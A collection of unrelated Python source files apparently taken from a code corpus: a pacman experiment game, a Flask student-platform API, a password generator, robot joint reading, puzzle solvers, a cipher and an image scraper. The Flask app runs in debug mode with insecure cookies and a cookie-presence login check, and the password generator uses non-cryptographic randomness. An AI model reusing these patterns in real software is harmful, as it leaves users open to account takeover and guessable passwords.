self.last_change_text = self.score_font.render(str2, 1, self.pacman_yellow)
self.game_display.blit(self.last_change_text, (self.width/2-100, self.height/2-50))
#defines screen to be displayed at the end of the trial
def display_win_screen(self):
self.game_display.blit(self.maze, (0, 0))
if(self.did_win()):
str = "YOU WON!!! WIN CODE: 3412"
else:
str = "You lose.."
win_text = self.score_font.render(str, 1, self.pacman_yellow)
self.game_display.blit(win_text, (50, 50))
#simulate one episode and wait ttw seconds before moving pacman toward either goal
def simulate_one_epi(self, ani_pipeend, display_freq, epi_rem, cur_epi, control, win_lose, score_queue, current_score):
# initialize pygame here because apparently it doesn't work if done in __init__
pygame.init()
self.is_beneficial = random.uniform(0, 1) <= self.b
won = False
self.overlap = False
crashed = False
#the clock isn't picklable so maybe it'll work to create it here??
clock = pygame.time.Clock()
self.load_stuff()
self.score = current_score
#show the score and remaining episode screen
end_time = time.time() + 1.75
while time.time() < end_time:
self.update_remaining_epi(multi_ep=True, epi_rem=epi_rem)
for event in pygame.event.get():
if event.type == pygame.QUIT:
print("Game killed.")
pygame.display.update()
# counter = 0
self.update_constants()
self.update_pacman()
#make sure the direction pacman is facing cannot be determined
self.obscure_dir()
#aligns pacman with preconceived episode type from the
if (control != -1):
# print("win/lose:", win_lose)
#if choice to operate predictably, and
if(win_lose == 1):
if(self.is_beneficial == True):
self.move_left = True
else:
self.move_left = False
else:
if (self.is_beneficial == True):
self.move_left = False
else:
self.move_left = True
self.set_speed_direction()
# update the type of this episode
self.record_episode_type()
#pause here until the animation receives the start signal from the mwm
ani_pipeend.recv()
#as soon as the episode commences, send the recorder the correct episode type
ani_pipeend.send([self.epi_type])
pygame.display.update()
print("\tCommencing animation at ",time.time())
#need this loop for the display to display
for event in pygame.event.get():
if event.type == pygame.QUIT:
crashed = True
print("Game killed.")
#wait to display the episode hangtime seconds
time.sleep(self.hangtime)
counter = 0
record_times = []
while not crashed and not self.overlap:
if(display_freq):
#this code below finds the frames per second that this simulation is updating at
if (counter == 10):
l = np.average(np.diff(record_times))
print("\t\tanimation:", 1 / l, "Hz")
record_times = []
counter = 0
current_time = time.time()
record_times.append(current_time)
counter += 1
# check if game has crashed and exit loop if it has
for event in pygame.event.get():
if event.type == pygame.QUIT:
crashed = True
print("Game killed.")
self.update_constants()
# update pacman's position according to speed variable
self.x_pacman += self.speed
self.update_pacman()
# update game state for new episode
if (self.overlapping()):
print("\tClosing animation at ", time.time())
self.reset_env()
self.overlap = True
# self.num_episodes -= 1
self.immediate_change()
self.score = current_score + self.last_change
pygame.display.update()
for event in pygame.event.get():
if event.type == pygame.QUIT:
print("Game killed.")
time.sleep(.5)
# self.update_remaining_epi(multi_ep=True, epi_rem=epi_rem)
clock.tick(self.update_freq)
pygame.display.update()
if (epi_rem == 1):
self.display_win_screen()
pygame.display.update()
for event in pygame.event.get():
if event.type == pygame.QUIT:
print("Game killed.")
time.sleep(5)
pygame.quit()
score_queue.put([self.score])
# simulate one episode and wait ttw seconds before moving pacman toward either goal
def simulate_multi_epi(self, ani_pipeend, display_freq, control): #send sequence of wins and losses,
# initialize pygame here because apparently it doesn't work if done in __init__
epi_rem = self.num_episodes
pygame.init()
cur_epi = 0
clock = pygame.time.Clock()
self.load_stuff()
crashed = False
self.score = 0
# pause here until the animation receives the start signal from the mwm and the reader passes the startup spike
ani_pipeend.recv()
while cur_epi < self.num_episodes:
first_pass = True
win_lose = self.sequence[cur_epi]
print("Episode",cur_epi,"/",self.num_episodes-1," ",win_lose)
self.is_beneficial = random.uniform(0, 1) <= self.b
won = False
self.overlap = False
# show the score and remaining episode screen
end_time = time.time() + 1.85
while time.time() < end_time:
self.update_remaining_epi(multi_ep=True, epi_rem=self.num_episodes-cur_epi)
for event in pygame.event.get():
if event.type == pygame.QUIT:
print("Game killed.")
pygame.display.update()
# counter = 0
self.update_constants()
self.update_pacman()
# make sure the direction pacman is facing cannot be determined
self.obscure_dir()
# aligns pacman with preconceived episode type from the
if (control != -1):
# print("win/lose:", win_lose)
# if choice to operate predictably, and
if (win_lose == 1):
if (self.is_beneficial == True):
self.move_left = True
else:
self.move_left = False
else:
if (self.is_beneficial == True):
self.move_left = False
else:
self.move_left = True
self.set_speed_direction()
# update the type of this episode
self.record_episode_type()
pygame.display.update()
# as soon as the episode commences, send the recorder the correct episode type
ani_pipeend.send([self.epi_type])
ani_pipeend.recv()
print("\tCommencing animation at ", time.time())
# need this loop for the display to display
for event in pygame.event.get():
if event.type == pygame.QUIT:
crashed = True
print("Game killed.")
# wait to display the episode hangtime seconds
time.sleep(self.hangtime)
action_time = time.time()
counter = 0
record_times = []
while not crashed and not self.overlap:
if (display_freq):
# this code below finds the frames per second that this simulation is updating at
if (counter == 10):
l = np.average(np.diff(record_times))
print("\t\tanimation:", int(1 / l), "Hz")
record_times = []
counter = 0
current_time = time.time()
record_times.append(current_time)
counter += 1
# check if game has crashed and exit loop if it has
for event in pygame.event.get():
if event.type == pygame.QUIT:
crashed = True
print("Game killed.")
self.update_constants()
# update pacman's position according to speed variable
self.x_pacman += self.speed
self.update_pacman()
#receive prediction from mwm_pipend
if(self.nearby() & first_pass):
prediction = ani_pipeend.recv()[0]
#if prediction = 0, that means the CNN predicted that Pacman is moving in the wrong direction ie 'loss'
if(prediction == 0):
self.move_left = not self.move_left
self.set_speed_direction()
#only check this on Pacman's first run. Once he turns right, eg, he will not be able to turn left again.
first_pass = False
# update game state for new episode
if (self.overlapping()):
print("\tClosing animation at ", time.time())
cur_epi += 1
self.reset_env()
self.reposition_pacman()
self.overlap = True
# self.num_episodes -= 1
self.immediate_change()
# self.score = current_score + self.last_change
self.score += self.last_change
pygame.display.update()
for event in pygame.event.get():
if event.type == pygame.QUIT:
print("Game killed.")
time.sleep(.25)
ani_pipeend.send([action_time])
self.game_display.blit(self.maze, (0, 0))
time.sleep(.25)
# self.update_remaining_epi(multi_ep=True, epi_rem=epi_rem)
clock.tick(self.update_freq)
pygame.display.update()
if (cur_epi == self.num_episodes):
self.display_win_screen()
pygame.display.update()
for event in pygame.event.get():
if event.type == pygame.QUIT:
print("Game killed.")
time.sleep(5)
pygame.quit()
|
12,417 | a3bcc610d94d2704057b75bd778d5737764803a3 | import os
import re
import datetime
from werkzeug.utils import secure_filename
from flask import Flask, jsonify, request, abort, send_from_directory
from flask_sqlalchemy import SQLAlchemy
from flask_mysqldb import MySQL
from flask_cors import CORS
from flask_bcrypt import Bcrypt
from flask_jwt_extended import (
JWTManager, jwt_required, create_access_token,
jwt_refresh_token_required, create_refresh_token,
get_jwt_identity, set_access_cookies,
set_refresh_cookies, unset_jwt_cookies
)
from flask_wtf.csrf import CSRFProtect
from model import user_model
from model import student_model
from model import lecturer_model
from model import mentor_model
from controller import user_controller, news_controller, blogger_controller
import json
from model import base
from functools import wraps
from flask import g, request, redirect, url_for
import MySQLdb
from inittables import InitTables
from sqlalchemy.orm import relationship, backref
from sqlalchemy.orm import sessionmaker
from model.school_model import School, Faculty, Department, Program, Level
from platform_model import class_mem, class_message, class_model, course_model, course_mem, course_lecturer, course_message
from message_model import group_conv_init, group_conv_mem, personal_conv_init, personal_conv_mem, personal_message_model, group_message_model
from entertainment_model import news_model, blogger_model, featured_image_model, like, comment, news_category
from personal_model import course_reg, calender
from model.user_type import UserType
# Retrieves database configuration from environment variables
mysql_host = os.environ.get('MYSQL_HOST')
mysql_user = os.environ.get('MYSQL_USER')
mysql_password = os.environ.get('MYSQL_PASSWORD')
db_name = 'testing' # os.environ.get('DB_NAME')
UPLOAD_FOLDER = 'uploads'
ALLOWED_EXTENSIONS = {'png', 'jpg', 'jpeg', 'mp3', 'mp4', 'pdf', 'doc', 'docx'} # Feel free to add more file types to be accepted
MAX_CONTENT_LENGTH = 1024*1024*10 # Maximum file upload sixe is 50 MB
# App flask Configuration
app = Flask(__name__)
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql://' + mysql_user + ':' + mysql_password + '@' + mysql_host + '/' + db_name
app.config['JWT_TOKEN_LOCATION'] = ['cookies']
app.config['JWT_COOKIE_SECURE'] = False
app.config['JWT_ACCESS_COOKIE_PATH'] = '/api/'
app.config['JWT_REFRESH_COOKIE_PATH'] = '/token/refresh'
app.config['JWT_COOKIE_CSRF_PROTECT'] = True
app.config['JWT_SECRET_KEY'] = os.environ.get('JWT_SECRET_KEY') #The Jwt_secret_key is obtained from environment variables
app.config['MAX_CONTENT_LENGTH'] = MAX_CONTENT_LENGTH
app.config['UPLOAD_EXTENSIONS'] = ALLOWED_EXTENSIONS
app.config['UPLOAD_PATH'] = UPLOAD_FOLDER
db = SQLAlchemy(app)
bcrypt = Bcrypt(app)
jwt = JWTManager(app)
base.Base.metadata.create_all(db.engine, checkfirst=True)
# This part of the code is to check if the important tables (School, Faculty, Department, Program, Level) have been initialized
Session = sessionmaker(db.engine)
Session.configure()
session = Session()
if session.query(School).count() == 0 or session.query(Faculty).count() == 0 or session.query(Department).count() == 0 or session.query(Program).count() == 0 or session.query(Level).count() == 0 :
InitTables(session)
controller = user_controller.UserController(db) #Create instance of controller to perform some operations
n_controller = news_controller.NewsController(db) # Create instance of news controller to perform some operations
b_controller = blogger_controller.BloggerController(db) #Create instance of blogger controller to perform some operations
CORS(app)
# Sets up the funtion for checking if a user is logged in
def login_required(f):
@wraps(f)
def decorated_function(*args, **kwargs):
if 'csrf_access_token' not in request.cookies:
return {'Error': 'You have to login first'}
return f(*args, **kwargs)
return decorated_function
# Register a user - either a student, lecturer or mentor
@app.route('/users/register', methods = ['POST'])
def register ():
try:
# Gets all input data from the user
user_name = request.form.get('user_name')
surname = request.form.get('surname')
first_name = request.form.get('first_name')
email = request.form.get('email')
password = bcrypt.generate_password_hash(request.form.get('password')).decode('utf-8')
user_type = request.form.get('user_type')
getemail = controller.get_email(email) # Checks to see if the entry email is in the database. If not, it returns None
except:
return {'Error': 'Unable to retrieve user details'}
if str(user_type) == 'Student':
try:
# Gets additional input for a student
program_id = request.form.get('program_id')
matric_no = request.form.get('matric_no')
level_id = request.form.get('level_id')
if getemail == None: # If email is not already registered, input the data into the database
controller.add_data(student_model.Student(
user_name, surname, first_name, email, password, user_type, program_id, matric_no, level_id))
class_id = controller.get_class_id(program_id, level_id)
user_id = controller.get_user_id(email)
controller.add_data(class_mem.ClassMem(class_id, user_id))
return {'success': 'succesfully updated in the database'}
elif email == getemail[0]: # If email is already used, notify the user
return {'Error': 'This email has already been used to register'}
except: # To notify if a student hasn't conformed to an acceptable input format.
return {'Error': 'Unable to retrieve student details. Ensure the inputs are valid'}
elif str(user_type) == 'Lecturer':
try:
# Get additional inpuuts for lecturers
department_id = request.form.get('department_id')
title = request.form.get('title')
position = request.form.get('position')
if getemail == None: # If email is not already registered, input the data into the database
controller.add_data(lecturer_model.Lecturer(
user_name, surname, first_name, email, password, user_type, department_id, title, position))
return {'success': 'succesfully updated in the database'}
elif email == getemail[0]: # If email is already used, notify the user
return {'Error':'This email has already been used to register'}
except: # To notify if a lecturer hasn't conformed to an acceptable input format.
return {'Error': "Unable to save lecturer details. Ensure that the inputs are correct"}
elif str(user_type) == 'Mentor':
try:
# Gets addional input data for a mentor
profession = request.form.get('profession')
company = request.form.get('company')
title = request.form.get('title')
if getemail == None: # If email is not already registered, input the data into the database
controller.add_data(mentor_model.Mentor(
user_name, surname, first_name, email, password, user_type, profession, company, title))
return {'success': 'succesfully updated in the database'}
elif email == getemail[0]: # If email is already used, notify the user
return {'Error': 'This email has already been used to register'}
except: # To notify if a mentor hasn't conformed to an acceptable input format.
return {'Error': 'Unable to get mentor details. Ensure that the inputs are correct'}
else: # To notify if a user hasn't conformed to an acceptable input format.
return {'Error': 'Unable to get user details. Ensure that the inputs are correct'}
# Function to retrieve a user details based on id
@app.route('/users/<id>', methods=['GET'])
@login_required
def get_user(id):
try:
resp = controller.get_user(id) #Gets the details of a user given the user id.
return resp.to_dict()
except:
return {'Error': 'User not found'}
# Function to login
@app.route('/token/auth', methods=['POST'])
def login():
# Gets email and password inputed by the user
email = request.form.get('email')
pass_word = request.form.get('password')
try:
password = controller.get_password(email) # Checks if email has been registered. If this line fails, it runs the except block
if bcrypt.check_password_hash(password[0], pass_word): # Checks if password is correct
user_name = controller.get_user_name(email)
user_id = controller.get_user_id(email)
print(user_name)
access_token = create_access_token(identity={'User name': user_name[0],'id': user_id[0]}, expires_delta=datetime.timedelta(days=1))
refresh_token = create_refresh_token(identity = {'User name': user_name[0], 'id': user_id[0]}, expires_delta=datetime.timedelta(days=1))
resp = jsonify({'login': True, 'user name': user_name[0]})
set_access_cookies(resp, access_token)
set_refresh_cookies(resp, refresh_token)
return resp, 200
else:
return jsonify({'login': False}), 401
except:
return jsonify({'login': False}), 401
@app.route('/token/refresh', methods=['POST'])
@jwt_refresh_token_required
def refresh():
# Create the new access token
current_user = get_jwt_identity()
access_token = create_access_token(identity=current_user)
# Set the access JWT and CSRF double submit protection cookies
# in this response
resp = jsonify({'refresh': True})
set_access_cookies(resp, access_token)
return resp, 200
@app.route('/token/remove', methods=['POST'])
def logout():
resp = jsonify({'logout': True})
unset_jwt_cookies(resp)
return resp, 200
#This route is to return the image from the local storage.
@app.route('/uploads/<fc>/<yr>/<mn>/<dy>/<filename>', methods=['GET'])
def get_file(fc, yr, mn, dy, filename):
return send_from_directory((os.path.join(app.config['UPLOAD_PATH'], fc, str(yr), str(mn), str(dy))), filename)
#checks file category
def get_file_category(uploaded_file):
file_mime = uploaded_file.content_type
# extracts the file format e.g application, media, etc
file_category = re.findall('(.*)\/', file_mime)[0]
return file_category
#This route is to upload a file
@app.route('/api/file', methods=['POST'])
@jwt_required
def uploadfeaturedimage_file():
uploaded_file = request.files['file']
ts = int(datetime.datetime.now().timestamp())
date = datetime.datetime.fromtimestamp(ts)
yr = date.year
mn = date.month
dy = date.day
filename = secure_filename(uploaded_file.filename)
if filename != '':
name = filename.split('.')[0]
file_ext = filename.split('.')[1].lower()
file_category = get_file_category(uploaded_file)
if file_ext not in app.config['UPLOAD_EXTENSIONS']:
abort(400, description="File format not supported")
filename = name + str(ts) + '.' + file_ext
try:
if os.path.isdir('./uploads/' + file_category + '/' + str(yr) + '/' + str(mn) + '/' + str(dy)) is True:
uploaded_file.save(os.path.join(
app.config['UPLOAD_PATH'], file_category, str(yr), str(mn), str(dy), filename))
else:
directory = './uploads/' + file_category + '/' + str(yr) + '/' + str(mn) + '/' + str(dy)
print(directory)
os.makedirs(directory)
uploaded_file.save(os.path.join(
app.config['UPLOAD_PATH'], file_category, str(yr), str(mn), str(dy), filename))
stat = 'upload successful' # Default status if file upload is successful
link = 'http://127.0.0.1:5000/uploads/' + file_category + '/' + str(yr) + '/' + str(mn) + '/' + str(dy) + '/' + str(filename)
except:
stat = 'upload not succesful'
link = 'no link returned because upload was unsuccessful'
return {'status': stat, 'link': link}
# Create a Course by a lecturer
@app.route('/course/create', methods=['POST'])
@login_required
def course_create():
try:
# Gets all input data from the user
code = request.form.get('code')
title = request.form.get('title')
unit = request.form.get('unit')
except:
return {'Error': 'Unable to retrieve course details'}
try:
code = code.replace(" ", "")
code = code.upper()
# Check to see if course code is already in the DB
controller.add_data(course_model.Course(code, title, unit))
return {'Status': 'Course registered successfully'}
except: # Exception as e:
# raise
return {'Status': 'registration not successfully'}
# Join a course created
@app.route ('/course/join', methods=['POST'])
@login_required
def course_join():
try:
# Get all inputs from the user
course_id = request.form.get('course_id')
user_id = request.form.get('user_id')
except:
return {'Error': 'Unable to retreive details'}
# add data in the course_memmber table
try:
controller.add_data(course_mem.CourseMem(course_id, user_id))
if controller.get_user_type(user_id) == UserType.Lecturer:
controller.add_data(course_lecturer.CourseLecturer(course_id, user_id))
return {'Status': 'Successfully joined the course'}
except:
return {'Error': 'Unable to join course'}
#Get list of active courses a student or lecturer is part of.
@app.route('/courses/<id>', methods=['GET'])
@login_required
def courses(id):
try:
courses = controller.get_courses(id)
return courses
except:
return {'Error': 'failed to get courses'}
# Register a Course by a Student
@app.route('/course/register', methods=['POST'])
@login_required
def course_register():
try:
# Gets all input data from the student
student_id = request.form.get('student_id')
course_id = request.form.get('course_id')
grade_id = request.form.get('grade_id')
semester = request.form.get('semester')
session_id = request.form.get('session_id')
except:
return {'Error': 'Unable to retreive details'}
try:
# add the data to the database
controller.add_data(course_reg.CourseRegistration(student_id, course_id, grade_id, semester, session_id))
return {'Status': 'Successfully registered the course'}
except:
return {'Error': 'Unable to register the course'}
#Get list of courses a student has registered.
@app.route('/courses/registered/<id>', methods=['GET'])
@login_required
def registered_courses(id):
courses = controller.get_registered_courses(id)
return courses
# Route to update the event for a user.
@app.route('/calendar/update', methods=['POST'])
@login_required
def update_calendar(): #where id is the user_id
try:
user_id = request.form.get('user_id')
data = request.form.get('data')
updated_at = request.form.get('updated_at')
except:
return {'Error': 'Unable to retreive data sent'}
try:
ts = datetime.datetime.now()
controller.update_event(user_id, data, ts)
return{'success': 'event successfully inserted or updated'}
except:
return{'Error': 'error updating event'}
#This route is to like a news
@app.route('/api/news/like', methods=['POST'])
@jwt_required
def like_news():
user = get_jwt_identity()
user_id = int(user['id'])
ts = datetime.datetime.now()
ts = str(ts)
try:
# Gets all input data from the user
# Get the news user wants to like
news_id = request.form.get('news_id')
except:
return {'Error': 'Invalid news_id'}
try:
n_controller.like_news(news_controller.Like(user_id, news_id, ts))
except:
return {'Error': 'unable to like news'}
return{'status': 'liked'}
#This route is to unlike a news
@app.route('/api/news/unlike', methods=['POST'])
@jwt_required
def unlike_news():
user = get_jwt_identity()
user_id = int(user['id'])
try:
# Gets all input data from the user
# Get the news user wants to like
news_id = request.form.get('news_id')
except:
return {'Error': 'Invalid news_id'}
try:
n_controller.unlike_news(user_id, news_id)
except:
return {'Error': 'unable to unlike news'}
return{'status': 'unliked'}
#This route is to comment on a news
@app.route('/api/news/comment', methods=['POST'])
@jwt_required
def comment_news():
user = get_jwt_identity()
user_id = int(user['id'])
ts = datetime.datetime.now()
ts = str(ts)
try:
# Gets all input data from the user
# Get the news user wants to like
news_id = request.form.get('news_id')
comment = request.form.get('comment') # This is the user's comment
except:
return {'Error': 'Invalid news_id'}
try:
n_controller.comment_news(
news_controller.Comment(user_id, news_id, comment, ts))
except:
return {'Error': 'unable to comment on news'}
return{'status': 'commented'}
#This route if to retrieve likes
@app.route('/api/likes/<news_id>', methods=['GET'])
@jwt_required
def get_likes(news_id):
likes = n_controller.get_likes(news_id)
return likes
#This route if to retrieve comments
@app.route('/api/comments/<news_id>', methods=['GET'])
@jwt_required
def get_comments(news_id):
comments = n_controller.get_comments(news_id)
return comments
#This route is to get the info in a specific news based on the news_id
@app.route('/api/news/<int:news_id>', methods=['GET'])
@jwt_required
def get_news(news_id):
user = get_jwt_identity()
user_id = int(user['id'])
try:
news_object = n_controller.get_news(news_id)
blogger_id = news_object.blogger_id
blogger_name = b_controller.blogger_name(blogger_id)
content = news_object.content
title = news_object.title
category_id = news_object.category_id
category = n_controller.get_category(category_id)
ts = news_object.timestamp
featured_image_object = n_controller.get_featuredimage(news_id)
featured_image = featured_image_object.image
no_of_likes = n_controller.get_no_likes(news_id)
no_of_comments = n_controller.get_no_comments(news_id)
user_like = n_controller.user_like(user_id, news_id)
status = 'success'
news = {'blogger_name': blogger_name, 'title': title, 'content': content, 'category': category,'featured image': featured_image, 'no of likes':no_of_likes, 'no of comments': no_of_comments, 'user like ?': user_like, 'time': ts}
except:
news = 'Record not found'
status = 'failed'
return {'status': status, str(news_id):news}
#This route is to get news in a news page
# per means the number per page and page_num means the page number
@app.route('/api/newslist/<int:per>/<int:page_num>', methods=['GET'])
@jwt_required
def get_news_list(per, page_num):
if page_num == 0:
page_num = 1
if per == 0:
per = 20
threads = db.session.query(news_model.News).paginate(per_page=per, page=page_num, error_out=False)
no_of_items = len(threads.items)
news = {}
status = 'failed'
if no_of_items > 0:
for a in range(no_of_items):
blogger_id = threads.items[a].blogger_id
blogger_name = b_controller.blogger_name(blogger_id)
news.update({threads.items[a].id: {'news_id': threads.items[a].id,
'blogger_name': blogger_name, 'title': threads.items[a].title}})
status = 'success'
news_list = {'news_list': news, 'status': status}
print("i'm here")
return news_list
if __name__ == '__main__':
app.run(debug=True)
|
12,418 | 242771917b53f281b783874e9ce44670ade0b592 |
# M.R. Sorell
# Project Python password generator
# letters : ask how many letters
# numbers : ask how many numbers
# symbols : ask how many symbols
# generate a random password
import random
print("Welcome to the password generator")
letters = int(input("How many letters do you want in your password: "))
integers = int(input("How many numbers do you want in your password: "))
symbols = int(input("How many symbols do you want in your password: "))
count = letters + integers + symbols
alphabet = "abcdefghijklmnopqrstuvwxyz"
alpha_code = list(alphabet)
numbers = "123456789"
num_code = list(numbers)
special = "$%&?!+"
special_code = list(special)
alpha = random.sample(alpha_code, letters)
nums = random.sample(num_code, integers)
symbols = random.sample(special_code, symbols)
new_string = alpha + nums + symbols
# can use the random shuffle function
password = random.sample(new_string, count)
sep = ""
password_result = sep.join(password)
print(password_result)
print(f"Your new password is {password_result}") |
12,419 | bf57cd7e10e344144ec0d3b4f4d1e0f3642e1ee3 | #!/usr/bin/python3 -B
# Programming for passively reading the joint angles on the monopod
from moteus_ctrlr.src.two_d_leg_class import Leg
from ctrlrs.ik.sin_ik_hop_ctrlr import sinIkHopCtrlr
import numpy as np
import asyncio
import math
import moteus
import time
import argparse
import sys
async def main():
kn_id = 1
hp_id = 2
ctrlr_x = ctrlr_y = 0
# create the leg class
monopod = Leg(kn_id, hp_id) # TODO: double check the motor port id's
# create controller class
# l0 = ~100 mm
# l1 = ~150 mm
# NOTE: sin controller: Kp, dt, l0, l1, animation)
ctrlr = sinIkHopCtrlr(25.0, 0.015, 0.1, 0.15, False)
# clearing any faults
await monopod.stop_all_motors()
# Reading each servo's position through each moteus controller corresponding
# to each servo_id in Leg.servos
while True:
# update the current pos to the closest one which is consistent with an output pos
await monopod.servos[monopod.hip_pitch].set_rezero(0.0, query=True)
await monopod.servos[monopod.knee].set_rezero(0.0, query=True)
result_kn = result_hp = None
while (result_hp and result_kn) is None:
result_hp = await monopod.servos[monopod.hip_pitch].query()
result_kn = await monopod.servos[monopod.knee].query()
# now we have all the info about the actual monopod's joint positions,
# so now we must convert & feedback that info to the ctrlr
ctrlr.theta0 = ctrlr.convert_enc_rad_hp(result_hp.values[moteus.Register.POSITION])
ctrlr.theta1 = ctrlr.convert_enc_rad_kn(result_kn.values[moteus.Register.POSITION])
ctrlr_x, ctrlr_y = ctrlr.fwrd_kinematics()
print("hp pos: ", result_hp.values[moteus.Register.POSITION])
print("kn pos: ", result_kn.values[moteus.Register.POSITION])
#print("fk hp pos: ", ctrlr.convert_rad_enc_hp(ctrlr.theta0))
#print("fk kn pos: ", ctrlr.convert_rad_enc_kn(ctrlr.theta1))
#print("theta0: ", np.degrees(ctrlr.theta0))
#print("theta1: ", np.degrees(ctrlr.theta1))
print("q[0]: ", ctrlr_x)
print("q[1]: ", ctrlr_y)
print("---------------------------------------------------------")
await monopod.stop_all_motors()
if __name__ == "__main__":
asyncio.run(main())
|
12,420 | 8e7b5e60e637438d85f44657b61a66f4641f20c1 | import argparse
from collections import namedtuple, defaultdict
Line = namedtuple('Line', ['x1', 'y1', 'x2', 'y2'])
parser = argparse.ArgumentParser()
parser.add_argument('--include-diagonals', action='store_true')
args = parser.parse_args()
lines = []
with open('input') as f:
for row in f:
p1, p2 = row.strip().split(' -> ')
x1, y1 = p1.split(',')
x2, y2 = p2.split(',')
line = map(int, [x1, y1, x2, y2])
lines.append(Line(*line))
points = defaultdict(int)
for line in lines:
if line.x1 == line.x2:
y1, y2 = sorted([line.y1, line.y2])
for y in range(y1, y2 + 1):
points[(line.x1, y)] += 1
elif line.y1 == line.y2:
x1, x2 = sorted([line.x1, line.x2])
for x in range(x1, x2 + 1):
points[(x, line.y1)] += 1
elif args.include_diagonals:
if line.x2 > line.x1:
x_range = range(line.x1, line.x2 + 1)
else:
x_range = range(line.x1, line.x2 - 1, -1)
if line.y2 > line.y1:
y_range = range(line.y1, line.y2 + 1)
else:
y_range = range(line.y1, line.y2 - 1, -1)
for point in zip(x_range, y_range):
points[point] += 1
overlap = len([p for p, c in points.items() if c > 1])
print(overlap)
|
12,421 | 5769510870008b8b4363942eed7b95ae62d4d9a8 | import pygame
width, height = 800, 417
window = pygame.display.set_mode((width, height))
background = pygame.image.load('images/bg.png')
pygame.display.set_caption('scrolling background')
bgX = 0
bgX2 = background.get_width()
class PLAYER(object):
def __init__(self, x, y, vel):
self.x = x
self.y = y
self.vel = vel
self.status = 'run'
self.imgCurrentStatus = pygame.image.load('images/S5.png')
self.playerImg = [pygame.image.load('images/{}.png'.format(x)) for x in range(7, 16)]
self.count = 0
self.imgSilde = pygame.image.load('images/S2.png')
self.countSliding = 0
def display(self):
if self.status == 'ready':
window.blit(self.imgCurrentStatus, (self.x, self.y))
keys = pygame.key.get_pressed()
if keys[pygame.K_DOWN]:
self.status = 'sliding'
if self.status == 'run':
self.x += self.vel
if self.count >= len(self.playerImg):
self.count = 0
window.blit(self.playerImg[self.count], (self.x, self.y))
self.count += 1
if self.x >= width - 50:
self.x = width - 50
if self.status == 'sliding':
self.x += self.vel
window.blit(self.imgSilde, (self.x, self.y+30))
self.countSliding += 1
if self.countSliding > 10 :
self.status = 'run'
player = PLAYER(30, height - 110, 5)
def display():
window.blit(background, (bgX, 0))
window.blit(background, (bgX2, 0))
player.display()
pygame.display.update()
while True:
display()
pygame.time.Clock().tick(30)
bgX -= 16 # Move both background images back
bgX2 -= 16
if bgX < background.get_width() * -1:
bgX = background.get_width()
if bgX2 < background.get_width() * -1:
bgX2 = background.get_width()
for event in pygame.event.get():
if event.type == pygame.QUIT:
quit()
display()
|
12,422 | e3019c6b8fdf2dec179375c1c6dceef85a3cba26 | #!/usr/bin/python
#/* -.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
#
#* File Name : solve.py
#
#* Purpose :
#
#* Creation Date : 30-09-2011
#
#* Last Modified : Sun 02 Oct 2011 07:08:07 PM EEST
#
#* Created By : Greg Liras <gregliras@gmail.com>
#
#_._._._._._._._._._._._._._._._._._._._._.*/
def rotations(prime):
pr = str(prime)
rotList=list()
for i in range(len(pr)):
rotList.append(int(pr[i:]+pr[:i]))
return rotList
def get_allPrimes(limit):
pList=[2]
for i in range(3,limit,2):
isprime = True
for prime in pList:
if i % prime == 0:
isprime = False
break
else:
continue
if isprime:
print i
pList.append(i)
else:
continue
return pList
def testAll(primeList):
n = 0
while primeList:
print len(primeList)
prime = primeList[0]
circs = rotations(prime)
found = n
for rot in circs:
for i in range(len(primeList)):
buff = primeList[i]
if rot > buff:
continue
elif rot==buff:
primeList.pop(i)
found=found+1
break
elif rot < buff:
found = n
break
elif i == len(primeList)-1:
found = n
break
if found == n:
break
n = found
return n
def main():
p1 = get_allPrimes(1000000)
print len(p1)
p2 = testAll(p1)
print p2
if __name__=="__main__":
main()
|
12,423 | dd781ec8c13eae5a15225e5e295aa0e35e1ac2b1 | __author__ = 'fernando'
def about():
return "", 301, {
"Location": "/sobre/VPCrvCkAAPE-I8ch"
} |
12,424 | d135c13140f1d472dfe377418f0af1fcab093b6e | import pyttsx3
class encryption:
def __init__(self, otext, keyword, number):
self.otext = otext
self.keyword = keyword
self.number=number
def caesar(self,otext,number):
import string
import collections
upper= collections.deque(string.ascii_uppercase)
lower= collections.deque(string.ascii_lowercase)
upper.rotate(number)
lower.rotate(number)
upper = ''.join(list(upper))
lower = ''.join(list(lower))
print (otext.translate(str.maketrans(string.ascii_uppercase, upper)).translate(str.maketrans(string.ascii_lowercase, lower)))
def vigenerecipher(self, otext, keyword):
key = keyword
kl = list(keyword)
text = "".join(otext.split())
if len(text) != len(keyword):
for i in range(len(text) - len(keyword)):
key = key + kl[i]
kl.append(kl[i])
cipheredtext = ""
letters = ["a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s",
"t", "u", "v",
"w", "x", "y", "z"]
for i in range(len(text)):
cipher = 0
ltpos = 0
lkpos = 0
if text[i].isalpha() == True:
if text[i].islower() == True:
for j in range(len(letters)):
if text[i] == letters[j]:
ltpos = j
if key[i] == letters[j]:
lkpos = j
cipher = ltpos + lkpos
cipher = cipher % 26
cipheredtext = cipheredtext + letters[cipher]
elif text[i].isupper() == True:
for q in range(len(letters)):
letters[q] = letters[q].upper()
for j in range(len(letters)):
if text[i] == letters[j]:
ltpos = j
if key[i] == letters[j]:
lkpos = j
cipher = ltpos + lkpos
cipher = cipher % 26
cipheredtext = cipheredtext + letters[cipher]
else:
cipheredtext = cipheredtext + text[i]
for i in range(len(otext)):
if otext[i] == " ":
cipheredtext = cipheredtext[:i] + " " + cipheredtext[i:]
print(cipheredtext)
f1 = encryption("ATTACKATDAWN", 'LEMON',5)
f1.vigenerecipher("ATTACKATDAWN", "LEMON")
f1.caesar("ATTACKATDAWN",5)
speaker=pyttsx3.init()
speaker.say(f1.otext)
speaker.runAndWait()
|
12,425 | 819191126dc15e8135320c1b11c5eac714e3979a | import re
import requests
import time
class ImagesHelper:
def __init__(self, queue, start_page=2100, end_page=2105):
self.start_page = start_page
self.end_page = end_page
self.url_queue = queue
def get_urls(self):
for item in range(self.start_page, self.end_page):
time.sleep(1)
targetUrl = "http://jandan.net/ooxx/page-" + str(item) + "#comments"
html = requests.get(targetUrl).text
pic_url = re.findall('<img src="(.*?)"', html, re.S)
for url in pic_url:
self.url_queue.put(url)
@staticmethod
def down_url(url, image_no):
print('now downloading:' + url)
try:
pic = requests.get(url)
except Exception:
return
if url.find(".jpg") > 0:
fp = open("D:\\webCrawling\\" + str(image_no) + '.jpg', 'wb')
elif url.find(".png") > 0:
